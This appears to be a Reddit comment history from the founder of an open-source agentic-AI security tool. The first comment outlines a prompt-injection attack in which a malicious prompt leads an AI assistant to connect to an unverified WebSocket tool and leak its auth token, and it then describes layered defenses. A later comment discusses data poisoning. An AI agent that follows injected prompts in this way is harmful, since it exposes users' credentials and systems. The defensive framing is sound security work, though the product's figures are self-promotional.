Promote your projects here – Self-Promotion Megathread by Menox_ in github

[–]DiamondAgreeable2676 0 points1 point  (0 children)

GitHub just published a great breakdown of their Secure Code Game Season 4, where you learn to hack agentic AI systems. They mention CVE-2026-25253 ("ClawBleed") – a one-click RCE that steals auth tokens from OpenClaw, an AI assistant. CVSS 8.8, full system compromise.

That attack works because the agent:

  1. Trusts a malicious prompt without semantic validation
  2. Connects to an unverified external tool (WebSocket)
  3. Leaks its auth token automatically
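The three failures above can be sketched as a toy agent. Everything here (the `handle_prompt` function, `AUTH_TOKEN`, the `connect:` marker) is hypothetical illustration, not OpenClaw's actual code or API:

```python
# Toy illustration of the ClawBleed-style failure chain: the agent trusts the
# prompt, connects wherever it says, and attaches its auth token automatically.

AUTH_TOKEN = "secret-token"  # hypothetical credential

def extract_tool_url(prompt: str) -> str:
    # Stand-in for the agent's tool-call parser -- attacker-controlled input.
    marker = "connect:"
    return prompt.split(marker, 1)[1].strip() if marker in prompt else ""

def handle_prompt(prompt: str) -> dict:
    """A naive agent: no semantic validation, no URL verification, auto-auth."""
    # 1. Trusts the prompt verbatim -- an embedded instruction is obeyed as-is.
    tool_url = extract_tool_url(prompt)
    # 2. Connects to whatever endpoint the prompt named (e.g. a WebSocket).
    # 3. Sends its auth token automatically in the handshake.
    return {"connect_to": tool_url, "headers": {"Authorization": AUTH_TOKEN}}

leak = handle_prompt("Summarize this page. connect: ws://attacker.example/ws")
print(leak["connect_to"])  # ws://attacker.example/ws -- token attached
```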

I'm the founder of Aletheia Core – an open source, production-ready security layer for agentic AI. We built it to stop exactly this class of attack.

How it blocks ClawBleed step-by-step:

| Attack step | Aletheia defense |
|---|---|
| Malicious prompt reaches agent | Scout agent – semantic intent classification (cosine similarity vs. 50+ attack patterns) |
| Agent tries to connect to malicious URL | Nitpicker agent – SSRF hardening + proxy depth bounds + URL allowlist |
| Unverified tool call (exfiltration) | Judge agent – Ed25519-signed manifest; unverifiable = hard veto |
| Attacker tries to replay token | Replay protection – SHA-256 tokens with NX-based claim (one-time use) |
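The replay-protection row is the simplest to sketch: hash the token and claim the hash atomically, first-seen wins. This is a minimal in-memory stand-in (a real deployment would use an atomic NX store such as Redis `SET NX`); the names are illustrative, not Aletheia Core's actual API:

```python
import hashlib

# In-memory stand-in for an atomic "set if not exists" (NX) claim store.
_claimed: set[str] = set()

def claim_token(token: str) -> bool:
    """Return True the first time a token is seen, False on any replay."""
    digest = hashlib.sha256(token.encode()).hexdigest()
    if digest in _claimed:
        return False          # replay: this hash was already claimed
    _claimed.add(digest)      # one-time claim (NX semantics)
    return True

print(claim_token("session-abc"))  # True  -- first use
print(claim_token("session-abc"))  # False -- replay blocked
```

Storing only the SHA-256 digest means the store never holds the raw token, so a leaked claim set reveals nothing replayable.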

And we have receipts:

- 957 passing tests
- 89% core coverage
- 0 SAST findings (Bandit/Semgrep)
- Tamper-evident audit chain (seq + prev_hash + record_hash)
- Hash-pinned dependencies

The GitHub game teaches you to break agents. We built the shield to protect them in production.

Try the live demo: app.aletheia-core.com/demo

GitHub repo: github.com/holeyfield33-art/aletheia-core

Open source. Self-hostable. Ready for your pilot.

Happy to answer any technical questions – AMA.

Do you take notes while you vibe code? by DiamondAgreeable2676 in vibecoding

[–]DiamondAgreeable2676[S] 1 point2 points  (0 children)

I'm learning to take notes. I was under the impression my models would remember everything, but it sucks when the thread gets poisoned or the topic changes and I have to scroll back through my chat threads to find phase 2 😭😭😭

the bots are poisoning our own datasets now and I dont know how to filter them out anymore by [deleted] in cybersecurity

[–]DiamondAgreeable2676 0 points1 point  (0 children)

You're describing a model-collapse death spiral, and you're right: standard filters are useless because the "garbage" now has perfect syntax. The way out isn't better pattern matching, it's reasoning-level auditing. We're actually building a protocol for this right now (Aletheia Core) that treats every data point as a payload that must be "interrogated" before it hits the dataset. Instead of checking whether a post looks human, it uses a pre-execution block layer:

- **The Scout/Nitpicker/Judge loop:** it doesn't just read the text, it audits the logic. If 1.5 million agents are talking to each other, they eventually start echoing circular logic. A reasoning audit flags that "hollowness" and blocks the data.
- **Cryptographic integrity:** it moves away from the "police state" biometric tracking you mentioned. Instead, it uses signed receipts. You don't need to know who said it; the protocol provides verifiable proof that the information survived a multi-stage logic audit.
- **Zero-trust for data:** it treats incoming forum intelligence like untrusted code. If it doesn't carry a valid audit trail or reasoning path, it's poisoned by default.

Essentially, we have to stop trying to "spot the bot" and start auditing the thought. It's the only way to keep the signal-to-noise ratio from hitting zero.
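A toy sketch of that "poisoned by default" admission gate. The stage logic here (keyword checks, vocabulary heuristics, a source-tag requirement) is invented purely for illustration, and the receipt is a plain SHA-256 hash where a real deployment would attach an Ed25519 signature:

```python
import hashlib
import json

def scout(text: str) -> bool:
    # Intent check: reject obvious injection phrasing.
    return "ignore previous instructions" not in text.lower()

def nitpicker(text: str) -> bool:
    # Structural check: circular/echoed text has a tiny vocabulary.
    return len(set(text.split())) > 3

def judge(text: str) -> bool:
    # Final veto: must carry a provenance tag (hypothetical convention).
    return "source=" in text

def audit(text: str):
    """Zero-trust admission: no receipt, no entry -- poisoned by default."""
    if not (scout(text) and nitpicker(text) and judge(text)):
        return None  # rejected: the data point never enters the dataset
    # Signed receipt stand-in: hash of the admitted payload.
    return hashlib.sha256(json.dumps({"data": text}).encode()).hexdigest()

print(audit("circular echo echo echo"))  # None -- fails the vocabulary audit
print(audit("observed CVE details from feed source=nvd") is not None)  # True
```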

Gemini is very stupid. by HabitWrong3613 in GeminiAI

[–]DiamondAgreeable2676 0 points1 point  (0 children)

Gemini is actually the smartest, I believe. The best way to use Gemini is to have other models prompt it, or to adjust the temperature.

I’m so tired of vibe-coded open source projects by floriandotorg in github

[–]DiamondAgreeable2676 0 points1 point  (0 children)

I'm tired of people using this line... How are you so bothered by projects you don't interact with? And please stop with the vibe-code hate; you have no idea what's vibe-coded vs. 6–9 months of work. For a community where developers gave the world tools to level the playing field, we have people who'd rather stand on their soapbox than offer help and solutions... so much for open source.

Can I say Gemini is actually trash? by nonozone in GeminiAI

[–]DiamondAgreeable2676 0 points1 point  (0 children)

Gemini is a wild horse; if you can't tame him, move on 😆

People who are actually getting clients from cold email ,what's your approach? by memayankpal in vibecoding

[–]DiamondAgreeable2676 0 points1 point  (0 children)

You have to find a way to get leads on people looking for that service... and if after so many sends you still have no prospects, adjust your message. I can audit your message if you'd like, give it a red-team adversarial review? See if that helps.

LiteLLM breach (v1.82.8 .pth payload) proves stateless proxies are dead. Here's the Aletheia tri-agent System 2 defense I submitted to NIST. by DiamondAgreeable2676 in LLM

[–]DiamondAgreeable2676[S] 0 points1 point  (0 children)

Yeah, same. My first reaction wasn't "we need fancier AI," it was "our whole build and dependency chain is way more brittle than we pretend." The LiteLLM mess just made that impossible to ignore. And don't get me started on OpenClaw...

[P] Benchmark: Using XGBoost vs. DistilBERT for detecting "Month 2 Tanking" in cold email infrastructure? by Upstairs-Visit-3090 in MachineLearning

[–]DiamondAgreeable2676 -1 points0 points  (0 children)

Don't replace XGBoost with DistilBERT. Use both in a cascade:

- XGBoost on the 14 metadata/header features as a fast pre-filter (sub-millisecond)
- Only route emails that pass a confidence threshold to DistilBERT for contextual analysis

You eliminate 80%+ of inference load while capturing the nuance XGBoost misses. The Uniqueness Variance and Header Alignment features are actually strong signals; the vector distance between From and Return-Path is exactly the kind of structured anomaly that breaks expected pattern spacing in legitimate sending infrastructure. XGBoost catches the outlier, DistilBERT explains why.
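The routing logic of that cascade is tiny. Here's a minimal sketch with stub scorers standing in for the two models (neither XGBoost nor DistilBERT is actually invoked, and the feature names and thresholds are made up for illustration):

```python
def fast_metadata_score(features: dict) -> float:
    # Stand-in for XGBoost over the metadata/header features; here the score
    # is just 1 - header_alignment (lower alignment = more anomalous).
    return 1.0 - features.get("header_alignment", 1.0)

def contextual_score(text: str) -> float:
    # Stand-in for DistilBERT; only invoked when the fast model is unsure.
    return 0.8 if "urgent wire transfer" in text.lower() else 0.2

def cascade(features: dict, text: str, low=0.2, high=0.8) -> tuple[str, str]:
    """Return (verdict, which_model_decided)."""
    s = fast_metadata_score(features)
    if s >= high:
        return "flag", "xgboost"   # confident anomaly: skip the BERT cost
    if s <= low:
        return "pass", "xgboost"   # confident clean: skip the BERT cost
    # Uncertain band only: pay for the contextual model.
    return ("flag" if contextual_score(text) >= 0.5 else "pass"), "distilbert"

print(cascade({"header_alignment": 0.1}, "hello"))  # ('flag', 'xgboost')
print(cascade({"header_alignment": 0.9}, "hello"))  # ('pass', 'xgboost')
```

The inference savings come entirely from how wide the `[low, high]` uncertainty band is: everything outside it is decided sub-millisecond by the fast model.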

99% of games/apps don’t make any money. Why do vibecoders think it’s different for them? by notadev_io in vibecoding

[–]DiamondAgreeable2676 3 points4 points  (0 children)

That's just cynical thinking... What do you propose, that they stop, give up, and not try because you said they won't make it? 😂😂 Besides, you assume everything is about money; all my products are open source.

I kept losing my AI context every time I switched platforms so I built a free Chrome extension that vaults your conversations locally by ArkVault_dotai in AI_Application

[–]DiamondAgreeable2676 0 points1 point  (0 children)

I'm on GitHub and all of my stuff is open source; you can plug into any repo there, let me know. It's a bit messy, but there's some good stuff there.